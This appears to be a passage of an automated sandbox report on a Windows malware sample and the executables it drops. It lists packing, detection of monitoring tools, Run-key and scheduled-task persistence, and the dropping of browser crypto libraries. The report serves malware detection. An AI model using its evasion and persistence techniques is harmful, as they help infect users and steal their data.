Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1816064 > 1048576

Source: file.exe

Static PE information: Raw size of juusqcgn is bigger than: 0x100000 < 0x1a1a00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a0969106aa.exe, 0000001C.00000003.2941381485.0000000004750000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001C.00000002.3075139523.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001E.00000003.3098995666.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001E.00000002.3139269920.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000003.3230672067.0000000005370000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001F.00000002.3270869703.0000000000D42000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Unpacked PE file: 21.2.DocumentsHCFBFBAEBK.exe.840000.0.unpack :EW;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 22.2.skotes.exe.160000.0.unpack :EW;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 23.2.skotes.exe.160000.0.unpack :EW;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vosxtpoy:EW;nqcvauwq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Unpacked PE file: 24.2.6fc7e371fe.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Unpacked PE file: 27.2.6fc7e371fe.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Unpacked PE file: 28.2.a0969106aa.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W;rfbmunfc:EW;iqxhhqxy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Unpacked PE file: 29.2.6fc7e371fe.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;juusqcgn:EW;nciomklg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Unpacked PE file: 30.2.a0969106aa.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W;rfbmunfc:EW;iqxhhqxy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Unpacked PE file: 31.2.a0969106aa.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W;rfbmunfc:EW;iqxhhqxy:EW;.taggant:EW; vs :ER;.rsrc:W;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6AC410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C6AC410

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: real checksum: 0x310b43 should be: 0x3131a1
Source: file.exe	Static PE information: real checksum: 0x1bfe46 should be: 0x1c4469
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1bfe46 should be: 0x1c4469
Source: skotes.exe.21.dr	Static PE information: real checksum: 0x310b43 should be: 0x3131a1

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: juusqcgn
Source: file.exe	Static PE information: section name: nciomklg
Source: file.exe	Static PE information: section name: .taggant
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name:
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: vosxtpoy
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: nqcvauwq
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: juusqcgn
Source: random[1].exe.0.dr	Static PE information: section name: nciomklg
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.21.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name: .idata
Source: skotes.exe.21.dr	Static PE information: section name: vosxtpoy
Source: skotes.exe.21.dr	Static PE information: section name: nqcvauwq
Source: skotes.exe.21.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B536 push ecx; ret	0_2_6C67B549
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0085D91C push ecx; ret	21_2_0085D92F
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00851359 push es; ret	21_2_0085135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0017D91C push ecx; ret	22_2_0017D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0017D91C push ecx; ret	23_2_0017D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0017DFC6 push ecx; ret	23_2_0017DFD9

Source: file.exe	Static PE information: section name: juusqcgn entropy: 7.954433207913269
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: entropy: 7.060847869629145
Source: random[1].exe.0.dr	Static PE information: section name: juusqcgn entropy: 7.954433207913269
Source: skotes.exe.21.dr	Static PE information: section name: entropy: 7.060847869629145

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHCFBFBAEBK.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsHCFBFBAEBK.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHCFBFBAEBK.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6fc7e371fe.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a0969106aa.exe

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHCFBFBAEBK.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

File created: C:\Windows\Tasks\skotes.job

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6fc7e371fe.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6fc7e371fe.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a0969106aa.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a0969106aa.exe

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6A55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6C6A55F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
